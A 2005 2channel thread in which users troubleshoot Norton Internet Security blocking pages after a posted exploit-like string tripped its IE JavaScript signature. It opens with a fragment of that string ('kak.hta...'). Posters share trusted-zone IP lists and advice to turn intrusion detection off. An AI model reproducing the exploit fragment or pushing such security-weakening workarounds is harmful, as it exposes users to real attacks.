2005/11/30(水) 07:58:17ID:vGigrqZf0
kak.hta';ken=wd+'START
0291動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 11:39:07ID:yXtj0IcE0
>>13は実行したけどWin板が読めないです... (ノД`)
0292外野ァァン
垢版 |
2005/11/30(水) 11:44:14ID:FXqml7ZB0
>>288 みたいな書き込みがあるとどうなるの?
0293291
垢版 |
2005/11/30(水) 12:11:07ID:yXtj0IcE0
すんませんでした Janeのスレ再読み込みで原因判明です
自分が見ようとしてたスレの最終レスに>>4が書き込まれてた (`・ω・´)
0294動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 12:11:41ID:ir1WgKBa0
>>291
一時、先生の進入検知をオフにして
その板なりスレなりを読み込んでログを取得する。
そのあと侵入検知をオンに戻せばいい。
アンカー狂ってる人もこれやってログを再取得すれば直るよ。
難点はちょっとだけマンドクセ(´・∀・`)
0295291
垢版 |
2005/11/30(水) 12:17:43ID:yXtj0IcE0
>>294
はい、そんなふうにやってみますね
アドバイスどうもありがとう (*´д`*)
0297動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 12:49:08ID:xisfjX4H0
>>291
Win板はちゃんと>>13の範囲内にあるから読めないのはおかしいな
多分侵入検知で30分読めない状態になってるとかそんなのだから
侵入検知設定で解除すれば?
0302動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 14:29:02ID:j2YTL7z90
>>299
なるほど
0304外野ァァン
垢版 |
2005/11/30(水) 16:24:16ID:FXqml7ZB0
一箇所誤字ハケーン
「Nortn」になってる
0305動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 16:24:22ID:Jim9sdHh0
>>303
NIS2003が思いっきり間違ってますよ。
0306動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 16:26:07ID:oaHzsrCO0
>>303
最初の文字デカッ!老眼かよw
それなのに赤の自己責任がいやに小さいじゃないか

何にしても乙
0307動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 16:27:16ID:Jim9sdHh0
2003書くからちょいま。
0308マァヴ ◆jxAYUMI09s
垢版 |
2005/11/30(水) 16:27:52ID:CZxBUHKO0
よろ(^_^;)2003
0309マァヴ ◆jxAYUMI09s
垢版 |
2005/11/30(水) 16:30:08ID:CZxBUHKO0
>304
なおしたー(^_^;)

>306
ちょっとだけ(^_^;)>老眼
やや小さめにしてみた。
0311動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 16:31:48ID:jeCQyGXH0
臭いをたどってニュー速からきますた(・∀・)
0312動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 16:33:22ID:MwFcgwlr0
昨日のえなりかずきといいなんだなんだよ・・・?
0313マァヴ ◆jxAYUMI09s
垢版 |
2005/11/30(水) 16:33:34ID:CZxBUHKO0
さて、2004の対応を書かないと(^_^;)
0314動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 16:37:18ID:Jim9sdHh0
>>308これでおけ

NIS2003

Norton Internet Securityを開く
[ファイアーオール]をクリック
[設定]をクリック
[ホームネットワーク]タブをクリック
[信頼]→[追加]とクリック
[範囲指定を使う]にチェック
[インターネットの開始アドレス]に 206.223.147.0
[インターネットの終了アドレス]に 206.226.154.255
[OK]をクリック
0315マァヴ ◆jxAYUMI09s
垢版 |
2005/11/30(水) 16:38:22ID:CZxBUHKO0
>314
さんきう(^_^;)
0316マァヴ ◆jxAYUMI09s
垢版 |
2005/11/30(水) 16:39:04ID:CZxBUHKO0
更新したのこころ(^_^;)
0317外野ァァン
垢版 |
2005/11/30(水) 16:39:37ID:FXqml7ZB0
ファイアーオールってボート漕ぎの時に使うアレか
0318動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 16:48:38ID:Jim9sdHh0
×ファイアーオール
○ファイアウォール

すまんかった

NIS2003

Norton Internet Securityを開く
[ファイアウォール]をクリック
[設定]をクリック
[ホームネットワーク]タブをクリック
[信頼]→[追加]とクリック
[範囲指定を使う]にチェック
[インターネットの開始アドレス]に 206.223.147.0
[インターネットの終了アドレス]に 206.226.154.255
[OK]をクリック
0320マァヴ ◆jxAYUMI09s
垢版 |
2005/11/30(水) 17:01:12ID:CZxBUHKO0
>319
あ、現行商品って2006なの?(^_^;)

つか、誰か2004の対処方法教えて・・・・
0322動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 17:13:23ID:MW28T5Jp0
Down板でNIS2006のクラック方が書き込まれた後に、この騒動が起こった。
シマンテックの仕業と思うのは自分だけだろうか。
0324動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 17:18:07ID:Jim9sdHh0
>>320
この文追加すると親切かも。

206.223.147.0-206.226.154.255 の範囲に入らない板も存在するので
必要に応じて下記URLを参照し個別に設定して下さい。

http://sv2ch.baila6.jp/sv2ch01.html
0325動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 17:19:36ID:AU+by5DZ0
なんでこういう事するやつって永久アク禁にならんの?
何も悪くないオレ様が2chにアクセスするために
なんで脳豚の設定弄らなきゃならんの?
ばかじゃね。
0330動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 17:29:23ID:LgGtfuW70
>>318>>324
終了アドレス

×206.226.154.255
○206.223.154.255
0331マァヴ ◆jxAYUMI09s
垢版 |
2005/11/30(水) 17:31:12ID:CZxBUHKO0
2004は2005と同じと判明(^_^;)追加ー
2006はよーわからん
0332動け動けウゴウゴ2ちゃんねる
垢版 |
NGNG
202.222.31.214 be.2ch.net
206.223.147.35 headline.2ch.net stats.2ch.net
206.223.147.55 2chplus.2ch.net music4.2ch.net
206.223.147.60 pc7.2ch.net
206.223.147.220 aa5.2ch.net off3.2ch.net
206.223.147.230 qb5.2ch.net qb6.2ch.net
206.223.147.235 that4.2ch.net
206.223.148.120 up01.2ch.io
206.223.148.200 pc8.2ch.net
206.223.149.230 human5.2ch.net
206.223.149.235 school5.2ch.net
206.223.150.10 hobby8.2ch.net
206.223.150.15 bubble4.2ch.net
206.223.150.54 live22.2ch.net
206.223.150.100 book3.2ch.net travel2.2ch.net
206.223.150.110 live20.2ch.net
206.223.150.115 game10.2ch.net
206.223.150.120 news18.2ch.net
206.223.150.155 society3.2ch.net
206.223.150.175 etc3.2ch.net
206.223.150.180 live14.2ch.net qa.2ch.net
206.223.150.185 academy4.2ch.net science4.2ch.net
206.223.150.195 comic6.2ch.net
206.223.150.200 food6.2ch.net
206.223.150.205 tmp5.2ch.net
206.223.150.230 ex9.2ch.net
206.223.150.235 tv8.2ch.net
206.223.150.240 sports9.2ch.net
206.223.151.62 hobby7.2ch.net
206.223.151.67 news19.2ch.net
206.223.151.75 pie.bbspink.com
206.223.151.95 idol.bbspink.com
206.223.151.125 love3.2ch.net
206.223.151.130 live19.2ch.net
206.223.151.135 liveb1.2ch.net
206.223.151.140 money4.2ch.net
206.223.151.225 ex14.2ch.net
206.223.152.15 music5.2ch.net
206.223.152.30 dso.2ch.net etc4.2ch.net game9.2ch.net
206.223.152.40 sakura01.bbspink.com
206.223.152.50 live16.2ch.net
206.223.152.55 life7.2ch.net
206.223.152.60 sakura02.bbspink.com
206.223.152.145 tv7.2ch.net
206.223.152.150 live18.2ch.net
206.223.152.235 sakura03.bbspink.com
206.223.153.130 headline.bbspink.com
206.223.154.225 ex12.2ch.net
206.223.154.230 ex13.2ch.net
206.223.154.235 live21.2ch.net
206.223.154.240 anime.2ch.net
206.223.154.245 ex11.2ch.net
210.135.98.243 epg.2ch.net
210.224.161.33 sports2.2ch.net
0334動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 17:41:19ID:OuC6zTXy0
2006

「ファイヤーウォール」
「設定」
「ホーム(アクティブ)」←ここは設定による
「ネットワーク」
「信頼ゾーン」
「範囲で選択」
0337動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 17:54:05ID:Jim9sdHh0
五月蝿い事いって悪いけど、INS2003はダイヤログの表示無く
いきなり、404になるので混乱する人も居るかと…
0338動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 18:19:07ID:Gxo6UxA30
うあー、しんど!全部一個づつ追加した。
間違えてなければいいけど。これで安心かな!?
来年はノートンとおさらばする
0339動け動けウゴウゴ2ちゃんねる
垢版 |
NGNG
範囲で選択しなくても「個別」で空白区切りで登録できるお

202.222.31.214 206.223.147.35 206.223.147.55 206.223.147.60 206.223.147.220 206.223.147.230 206.223.147.235 206.223.148.120
206.223.148.200 206.223.149.230 206.223.149.235 206.223.150.10 206.223.150.15 206.223.150.54 206.223.150.100 206.223.150.110
206.223.150.115 206.223.150.120 206.223.150.155 206.223.150.175 206.223.150.180 206.223.150.185 206.223.150.195 206.223.150.200
206.223.150.205 206.223.150.230 206.223.150.235 206.223.150.240 206.223.151.62 206.223.151.67 206.223.151.75 206.223.151.95
206.223.151.125 206.223.151.130 206.223.151.135 206.223.151.140 206.223.151.225 206.223.152.15 206.223.152.30 206.223.152.40
206.223.152.50 206.223.152.55 206.223.152.60 206.223.152.145 206.223.152.150 206.223.152.235 206.223.153.130 206.223.154.225
206.223.154.230 206.223.154.235 206.223.154.240 206.223.154.245 210.135.98.243 210.224.161.33

一行に直して登録すれ

一瞬固まるけどw
0340動け動けウゴウゴ2ちゃんねる
垢版 |
NGNG
>>338 m9(^Д^)
0341動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 18:26:20ID:Gxo6UxA30
>>339 ちょwwおまwwwwwwwwwww
でも登録のとこ右クリできんかったけど
0346動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 18:58:01ID:PC88Iz0i0
アドレス指定して、専ブラのブクマしたスレは見られるようになったが、
スレ一覧の取得をすると同じ侵入検知を吐くのが謎だ…@ゾヌ1.0
HTTP MSIE〜自体の許可しかないのかなー?
0348動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 19:15:24ID:SY1wttrs0
はじめまして、こんばんわ。
僕も3日前くらいからHTTPなんちゃらエラーが出て、
2chの一部が見えたり見えなくなったりしてました。
最初は2chにアク禁されてる?とか2ch落ちてる?とか
思ったのですが、運用情報を思いついてここに来ました。

>>13が正しいってことで無問題ね。
僕も今のところ問題なし。

>>79
びびったYO

>>2chを信頼ゾーン
2chにハッキングされない?
ひろゆ○は2chねらーのパソコンやりたい放題じゃんw


>>ノートン先生の誤作動
高性能で検出率が高いから仕方ないと考えたら?
0349動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 19:21:13ID:f4gnAEcT0
範囲じゃなく>>339をコピペしたほうがいいよ
ノートン文字列だけで反応することないだろうに
ファイアウォール部分だけのアンインストはできないから
次はアンチウイルスだけ買おうと思う
0353動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 19:57:03ID:5XIwIWVx0
今、バスター御試版で読んだが、なんとも無い。ふ〜ん。
0354動け動けウゴウゴ2ちゃんねる
垢版 |
NGNG
>>341 登録するIPが、すでに登録されている範囲にかぶってると「かぶってるよ」って言われるけどそれかな
0356動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 20:27:12ID:va8RNOAI0
シマンテックでは「本当に危険なコードが埋め込まれた場合にブロックできなくなるので、お勧めはしない」という。
また、「脆弱性を突く攻撃コードを2ちゃんねるにいたずら目的でコピー&ペーストしている人がいる」とし、
安易に攻撃コードを書き込まないよう呼びかけている。

この言い方から考えると、シマンテックは対処する気ないみたいだな。
やっぱり自己責任で弄れってことか・・・
0357動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 20:36:45ID:+O0TR+lh0
書き込むなって言ってみんなが書き込まなくなるなら、ウィルスやスパイウェアは蔓延しないと思う・・・
0359動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 20:43:49ID:lQJBvF8/0
貼られてるスレがどんどん増えてるな・・・
>>356のとおりだとメーカーは対応する気無いみたいだし
穴あけることになるのも嫌だからノートン止めるかなぁ
0361動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 20:54:02ID:va8RNOAI0
>>356の書き込みソースは、>>350のリンク先な。
漏れの妄想じゃないから、各自で熟読してくだされ。

ラブレターコードの影響期間を思い出すと、今回のこれも相当長引きそうだよな。
NISの見切り時かもなぁ。強固なのは結構だが、柔軟性に欠け過ぎて使えねぇ・・・
0362動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 20:58:01ID:EmZzcwQn0
今「本当に危険なコードが埋め込まれた場合」はノートン組は侵入されまくりってこと?
0364動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 21:03:21ID:EmZzcwQn0
今の2chはハッカーからしたら格好のエサ場ってことか
入れ食い状態だもんな
0366動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 21:12:23ID:xTjSZYih0
えーと、
最初ログ取得する時だけ進入検知を切って、取得し終わったらまたつける。
ちょっと面倒だけど、今の所コレだけで問題は無いけどな。
また新たに例の文字列が書かれたら、多分2行目を繰り返す事になると思うけど。
0370動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 22:08:44ID:kbSrdeNR0
>>367
2ちゃんだけの問題じゃなくて、他のブログ、掲示板も同じようにされたら駄目らしいし

まさに「淘汰される」べきかと
0371動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 22:22:29ID:HHwDcv/f0
スレをひらいたらカーソンシティから攻撃されたのできました
0372動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 22:30:47ID:A13ySxtn0
ノートン叩いてる人って何なの?
0376動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 22:34:13ID:57oCpOeh0
>>372
貧乏人
0377動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 22:35:38ID:va8RNOAI0
>>372
一部の運営の中の人の発言から始まってるんだよ >淘汰されるべき

>>373
内容が理解できない、もしくは想像ができないなら、実行するべきではない。
0381動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 22:41:21ID:NwOhnKAh0
>>349
できるよ
0392動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 00:06:18ID:CAwXRD170
ttp://d.hatena.ne.jp/palm84/
↑こことか
ttp://kmajo.blog34.fc2.com/
↑ここを見ると とりあえず実害としては
「IEが落ちる」だけなのかな?

シグネチャ除外しようかな・・・
0396動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 00:18:32ID:CKm/Zduu0
NIS使い2ちゃんねらが全員信頼ゾーン対策した瞬間
JIMが気ィ狂って2ch鯖に攻撃スクリプトを組み込むという
ダメシナリオで映画化決定
0399動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 00:39:56ID:lF2jyvcp0
お前らちょっと無防備すぎだぞ
今回のはどうも火傷だけでは済まないような気がする
小心者が救われるかもな。
0402動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 00:57:33ID:A61JgGjE0
本件の主犯はマイクロソフト、IEの穴をふさいでないからNISで対応
それが裏目に出たのがこの騒動

218 名前:水色@飛行石 ★ 投稿日:2005/11/28(月) 14:14:56 ID:???0
うーん。
ノートンやめちゃったからよく判らないですがー。

MSの脆弱性の部分をノートンが対応したら、
それがトラップに利用されちゃったってことかなー。
0403動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 01:06:28ID:CKm/Zduu0
この中で一番悪いのは誰?

・クソIEのセキュ穴対応が遅いMS
・ただの文字列でも反応させてるシマンテック
・コードの書き込み禁止にしない2ch運営(特にマァヴ)
・自分の意思でNIS導入したユーザー
・姉歯と小島と藤田と木村
0404動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 01:12:11ID:p29wERnO0
参加者追加

・クソIEのセキュ穴対応が遅いMS
・ただの文字列でも反応させてるシマンテック
・コードの書き込み禁止にしない2ch運営(特にマァヴ)
・自分の意思でNIS導入したユーザー
・姉歯と小島と藤田と木村
・お前
・俺
・母ちゃん
・小泉
・将軍様
0408動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 02:45:38ID:XLtCWLe50
あげますね
0410動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 03:37:56ID:aESgP7FoO
この文章を見た人は、4日以内に不幸が起き、44日後に死にます。知り合いは、
これを信じず、親が死にました。それが嫌なら、これを、5カ所にコピペして下さい。
0418動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 10:38:43ID:BbdWIW8Y0
運営がとろとろしてるからいけねぇんだよボケが

じっくりことこと煮込んでんじゃねーんだよ
とっと対応しろやカス
0419 ◆inODPD6owQ
垢版 |
2005/12/01(木) 10:43:58ID:1fUs7RRF0
運営などいないという突っ込みは置いておいて。。。

>>418
http://qb5.2ch.net/test/read.cgi/operate/1132976990/448-449
448 名前: ◆SSu.zv/rvs [sage] 投稿日: 2005/11/29(火) 15:14:32 ID:zBqE3jpw0
淘汰されなきゃね、
生き残りを手伝う気はさらさらないっす

449 名前: ◆MUMUMUhnYI [sage] 投稿日: 2005/11/29(火) 15:18:01 ID:VEIDKG1+0
そんな迷惑なソフトなんて、自然にまかせてなくなるべきだって、
おじさんはゆうだろうな。

私も、そう思っていたり。
0423動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 13:11:41ID:BF/Q6J/m0
素通りさせる以外(信頼に追加以外)
なにか有効な方法ないのか?

つーか「信頼が追加」が「有効」なんてマジでいってんのか?
0424 ◆Reffiz2Zh.
垢版 |
2005/12/01(木) 13:14:29ID:ulq76mRW0
>423
NISを窓から(ry

今回の件で大分問い合わせ来てるにもかかわらず何も対策する予定もなさそうなので
別なのに乗り換えた方が無難かも
0425 ◆Reffiz2Zh.
垢版 |
2005/12/01(木) 13:15:47ID:ulq76mRW0
>424
参考記事

「2ちゃんねるの一部掲示板が見られない」Nortonがアクセス遮断
ttp://internet.watch.impress.co.jp/cda/news/2005/11/30/10035.html
0426動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 13:39:57ID:BF/Q6J/m0
>>425
今回の件はノートンが、なんとかするべきだろ?
今回のコードは短過ぎる。貼る馬鹿は後をたたない。

例えば「orz」が攻撃コードと認定されたら書いた奴のせいか?

買ったばっかりだけど返品できるのか?>ノートン
0428動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 15:59:55ID:7z8TtYrS0
ラブレターとか他のウイルスコードのことから考えてもシマンテックが対応する可能性は低い
セキュリティソフト乗り換える・反応がウザくても使う・セキュリティを無効にする・2ちゃんねるの鯖を信頼する
全ては利用者の判断
0430動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 16:22:47ID:SVI+eTJQ0
今はイタズラで済んでるし、NIS使ってる人だけの問題だけど
実際にこの脆弱性をを利用して被害を受けた場合
その書き込みをに対する処置をしなかった運営は問題にならないの?
0433動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 16:37:07ID:7TL/REr10
IEの脆弱性とNPFWのバグを同時に語るから混乱するんだ。
先生のバグだけに目を向けろ。IEの脆弱性はMSの問題だ。

ひろゆこが悪意のあるスクリプトを仕込む可能性があるとでも言いたいのか?>>430
0434動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 16:49:41ID:7z8TtYrS0
1.セキュリティソフトを乗り換え
   このままノートンを使っていれば防げたはずの被害を受けるかもしれない
2.このままノートンを使う
   今他のセキュリティソフトに乗り換えておけば防げたはずの被害を受けるかもしれない
3.この脆弱性に対する検出を無効にする
   この脆弱性をついた攻撃を受けるかもしれない
4.2ちゃんねるのサーバを検出対象から除外する
   2ちゃんねるを改竄して攻撃してくる人がいるかもしれない
   2ちゃんねるを書き換える権限を持った人が攻撃してくるかもしれない
   IPアドレスを詐称する方法を考案して攻撃してくる人がいるかもしれない

どれが起こりそうでどれが起こらなそうか
全ては自分で判断しなければなりません
0435動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 16:50:27ID:CKm/Zduu0
>>433
運営自身が何もしなくても○国人(○にはお好みの文字を入れてね)に2ch鯖
ハックられてありとあらゆる攻撃スクリプトを押し込まれるという可能性は無くもない
0436動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 16:55:04ID:Df3cQtuiP
攻撃してくる文字列は存在する
お前らマジで気をつけろよ
0438動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 16:56:46ID:7TL/REr10
>>435
もちろん可能性は0%ではないわな。
でもそれを言い出すとキリがないし、おじさん達のサーバ管理能力を疑う事になる。
当然100%信用しろとは言わないが。まあ>434て事で。
0440動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 17:05:19ID:L+TEuIfh0
MSがパッチ出すまでIE以外のブラウザ使うようにして
HTTP MSIE javaScript OnLoad Rte CodeExecのチェック外せばいいじゃん

なんで自分でどうにかしようとしないんだろうな
0441動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 17:06:31ID:FvA5b8vb0
ノートン叩いてる人はもし自分のウイルスソフトが同じような事したら笑っていられるんだろうか
0443動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 17:07:33ID:eRb3C05X0
自分でどうにかはわかるけど、やっぱノートンのファイアウォールが駄目だよ
実害のない文字列として、きちんと判別できないなんてまともなソフトといえない
0444動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 17:12:38ID:7TL/REr10
>>441
だれも叩いてるようにはみえないが。不具合を不具合と指摘してるだけ。
> 自分のウイルスソフトが同じような事したら笑っていられるんだろうか
とっとと捨てる。
0445動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 17:17:15ID:SqpGkdpj0
>>443
金取ってるソフトだし同意とはいえるが・・・

しかし、こんな些細な事で吠えてたらOSだってクラッシュするしキリないじゃん?

問題は使い手じゃないかな?

こんな簡単な問題自分でクリアできなければ、ネットってかPCやらなければいい。
むしろPC触る資格がない。
それだけじゃない?

だから、ノートン叩いてるのはド初心者かネタのどっちか。
自分で使ってるOSの方が沢山の問題抱えてるんだからね。
0449動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 17:37:22ID:CKm/Zduu0
    |
\  __  /
_ ( m ) _ピコーン
   l≡l
/  ('A`) \ そうだ俺たちにはまだ「人に優しい1ch.tv」があるじゃないか!
   ノヽノヽ
     くく
0450動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 17:48:17ID:SCMMKc830
>>117
>>118
NG使えるよ、透明で登録しておくと使える
ただし>>118の言うように原因究明で困る。
というのは、普通は自動で消されて問題ないのだが
該当レスにリンクする奴がいるとひっかかる。
その時は消えたレス番を探してそいつにリンクしてる奴を探さなければならんいかんので面倒。
という事でやっと突き止めた
>>299のように該当レスに>>でリンクするのはやめてくれ・・・
0451動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 18:19:35ID:BF/Q6J/m0
死万木偶の工作員ウザ杉。

なんの為に金払ってるんだ? なんの為のFWだ?

正確に有害なものだけを遮断するためだろう?
なんでもかんでも遮断するだけならFWなんていらねーよ。

「インタテーネッツは危険だから全ての接続を遮断します。」
これで金払えってか? ふざけるな。
0454動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 18:42:19ID:SqpGkdpj0
>>451
返品とかって、、、ノートンレベルの糞ソフトも使いこなせないならネットしない方がいい。

その前にバグだらけのWindowsをMSに返してこい。

つーか、初心者はノートン使うなと。
0455453
垢版 |
2005/12/01(木) 18:42:47ID:3bOr3hdX0
ごめん、やっぱり無駄だった。
0458動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 18:53:34ID:7TL/REr10
被害妄想や詭弁や煽るだけじゃなくてさ、救護するなら
もっと建設的な意見をいえよ。叩かれていると思ってるみんなに。

NPFWを使い続ける理由を。
0459動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 19:01:59ID:SqpGkdpj0
>>458
俺が脳豚を使い続ける理由は、10秒もあれば設定できて使えるから。
他の入れたりすれば金かかるしフリー入れても10秒ってわけにはいかないから。

そして救護だか何だかしらんけど、俺がここに書く理由は楽しいから(笑)
0460動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 19:02:44ID:BF/Q6J/m0
>>454 ID:SqpGkdpj0

凄い厨が湧いたな・・・

初心者だからノートンが誤作動するってか?
初心者も糞も、どんな玄人が今回の件を回避出来てるんだ?

対策が有害無害まとめてスルーしかない(これは回避策じゃない)
ノートンにちゃんと識別させる方法を教えてくれ。
0462動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 19:11:32ID:SqpGkdpj0
>>460
何いってんだ?
俺は、ノートンの設定もできない初心者じゃしょーがねーってこと言ってんだよ。

>ノートンにちゃんと識別させる方法を教えてくれ。
それに何?そんな文句はシマンテックに言えよ。
脳豚に識別させるってソース開かねーんだからできるわけねーべ アホか。

俺は、文句言ってる暇あるなら設定しろと言ってるんだ。
0463動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 19:17:31ID:BF/Q6J/m0
>>462
もう、お前が初心者で厨なのは良くわかった。
IP素通りさせるのが「設定」か?(笑

初心者板で大人しくしてろ低脳。
0464動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 19:17:32ID:niDioA4V0
喧嘩やめろよ!仲良くしろよ!
0465動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 19:19:38ID:7TL/REr10
>>462
だから煽りや詭弁は止めろといってるだろ。落ち着け。

>459をみるに、用は他のを入れるのマンドクセーし金払う気もないから
多少の不具合は設定で我慢するぜと言うことかな。
それも一つの意見だな。
0466動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 19:24:04ID:SqpGkdpj0
>>463
IP素通りさせるのが「設定」だ。

それ以外にノートンをどうにかできると思ったのか?
変な夢みてるんじゃねーよ。ド初心者が(笑)

つーか、気に入らないなら素直に他の使えばいいだろ。

まぁ、オマエにはIP受け入れてその後にフィルタ掛けるなん(ry
0467動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 19:30:29ID:/ztf1ywb0
6 名前:ひろゆき ◆3SHRUNYAXA 投稿日:05/01/09 00:00:25 ?## ID:RlY1yXg2
議論して、知識を得ようとしてるんじゃなくて、
勝ち負けにこだわってる人ってのは、
基本的に頭悪いと思ってます。。

0468動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 19:34:25ID:7TL/REr10
>>466
だから煽(ry

本質がずれてないか、NPFWが単なる文字列に反応する事に関しての情報の蓄積が趣旨のスレだぞ。
折角だから、使用者が初心者が多いだろうからその通のテクをここで披露すればみんなのためになるぞ。
0471動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 19:42:48ID:SCMMKc830
>>453
あー、ポップアップにもできるならいいのかもね
LIVEにはあったかなー
と思ったら>>455駄目でしたか
何故かあぼんじゃ駄目なんだよね
0473動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 19:56:01ID:SqpGkdpj0
>>468
確かにそうだなw
つか、正直煽りで暇潰して楽しんでいた。
荒らしてスマン。
BF/Q6J/m0 にも謝っておくよスマン。

じゃ一応俺の環境を書いておくよ 参考にならんと思うけど。

俺の場合ネットにはルーティングマシン通して接続してるから
ルーティングする際に怪しいコードを弾いてローカルで観覧してる。
つまり脳豚ファイァオールではなく別のマシンが防火壁になってる。

だから実は脳豚は関係無かったりする(´・ω・`)

そんじゃ消えます
0475動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 20:26:24ID:VVCYcTZd0
まとめページの対処方法をやってみたら
板覧がおかしくなったんですが元に戻せますかね?
janeDoeViewです
0478動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 21:07:38ID:NgGuaDqu0
   \  __  /
   _ (m) _ピコーン
      |ミ|
   /  .`´  \
     ('A`) そうだ諦めよう!
     ノヽノヽ
       くく
0479動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 21:09:49ID:VVCYcTZd0
>>476
ありがとう!
見てみます
0481動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 21:58:56ID:kJ795N2R0
フジスレにスレタイがこれのスレが
0482動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 22:03:15ID:dNq4OE/f0
なんか、直ったっぽくねぇ?
気のせい?
0483動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 22:33:57ID:fa798wEV0
あの、
【Norton Internet Security】
  ↓
【侵入防止】
  ↓
【AutoBlock】                      ←
手動で【遮断しているコンピュータ】を【すべてを遮断解除】→↑

の繰り返しが安全じゃないですか?
0484動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 22:42:48ID:7z8TtYrS0
コードが貼られたスレ(板)開く

侵入検出

遮断解除

取得をやりなおす

侵入検出

以下ループ

穴あけないと使えない
0485動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 22:49:36ID:UY8lxahn0
んなろー!ブラッドハウンドなんぞ貼ったやつ出てコイや!めんどくせー('A`)
さっきは実況chTXでも検出したぞ
0487動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 23:36:42ID:BF/Q6J/m0
なんかスレの流れが変。

「危険が嫌ならFW乗り換えろ」って意見は多数出る。
しかし金出して買った権利どうすんだ?

ユーザーに誤作動の責任なんか無いぞ。
乗り換えるにしても誤作動が原因なら当然返金だよな?

正規ユーザーがおらんのか? 工作員が邪魔してるのか?
0488動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 23:41:35ID:WIUt1ZNZ0
>>487
